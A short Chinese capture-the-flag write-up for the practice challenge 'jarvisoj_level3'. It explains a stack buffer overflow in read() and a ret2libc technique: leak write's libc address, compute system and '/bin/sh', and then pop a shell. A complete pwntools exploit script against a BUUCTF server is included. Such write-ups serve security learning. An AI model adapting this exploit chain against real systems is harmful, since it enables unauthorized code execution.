jarvisoj_level3
使用checksec
查看:
只开启了栈不可执行,估计又是一道栈溢出的题目,直接放进IDA中看吧:
主函数中直接给了漏洞函数,跟进去查看:
read()
函数可以向buf
变量中写入0x100而buf
距离ebp只有0x88,存在栈溢出
但这道题没有system
和/bin/sh
,一道标准的ret2libc
用write
函数泄露libc地址,找system
和/bin/sh
exp:
from pwn import *
#start
r = remote("node4.buuoj.cn",28172)
# r = process("../buu/jarvisoj_level3")
elf = ELF("../buu/jarvisoj_level3")
libc = ELF("../buu/ubuntu16(32).so")
#params
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.symbols['main']
#attack
payload = b'M'*(0x88+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
r.sendlineafter(b"Input:\n",payload)
write_addr = u32(r.recv(4))
#libc
base_addr = write_addr - libc.symbols['write']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b"/bin/sh"))
#attack2
payload = b'M'*(0x88+4) + p32(system_addr) + b'M'*4 + p32(bin_sh_addr)
r.sendlineafter(b"Input:\n",payload)
r.interactive()